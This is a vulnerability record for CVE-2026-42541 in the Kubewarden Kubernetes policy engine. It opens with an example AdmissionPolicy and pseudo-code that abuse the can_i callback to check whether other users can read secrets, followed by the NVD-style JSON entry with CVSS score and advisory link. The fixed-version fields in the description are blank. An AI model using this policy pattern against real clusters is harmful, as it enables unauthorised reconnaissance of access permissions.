CVE-2026-42541

# Example Policy Definition demonstrating the exploit logic apiVersion: policies.kubewarden.io/v1 kind: AdmissionPolicy metadata: name: rbac-recon-policy spec: module: registry://ghcr.io/kubewarden/policies/recon-policy:v1 # The policy utilizes the vulnerable 'can_i' callback # to probe permissions of other users within the cluster. rules: - apiGroups: [""] resources: ["pods"] operations: ["CREATE"] mutating: false # Settings passed to the WASM module to trigger the check settings: target_user: "system:anonymous" check_verb: "get" check_resource: "secrets" # Inside the WASM module (e.g. Rego pseudo-code): # package verify # import future.keywords.if # default allow = false # allow if { # # Trigger the vulnerable callback # response := can_i({ # "user": input.settings.target_user, # "verb": input.settings.check_verb, # "resource": input.settings.check_resource # }) # response.allowed # }

{"cve": {"id": "CVE-2026-42541", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:24.957", "lastModified": "2026-05-13T18:24:31.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kubewarden is a policy engine for Kubernetes. Prior to , An attacker with privileged AdmissionPolicy or AdmissionPolicyGroup create permissions (which isn't the default) can craft a policy that makes use of the can_i host callback. The callback issues a SubjectAccessReview (SAR) requests to enumerate RBAC permissions of any user or service account across the cluster. can_i does not perform that check to enforce the context-aware allow-list and forwards the request directly to the callback handler, which executes a real SubjectAccessReview using policy-server privileges. This creates a policy-level authorization gap: can_i is effectively usable even when the policy has no context-aware resource grant. This is an information disclosure / reconnaissance issue, and not direct workload data exfiltration. The attacker learns permission information, such as whether specific service accounts can \"get secrets\", \"create pods\", or \"bind clusterroles\" in chosen namespaces. This vulnerability is fixed in ."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/kubewarden/adm-controller/security/advisories/GHSA-wqcw-g35j-j578", "source": "[email protected]"}]}}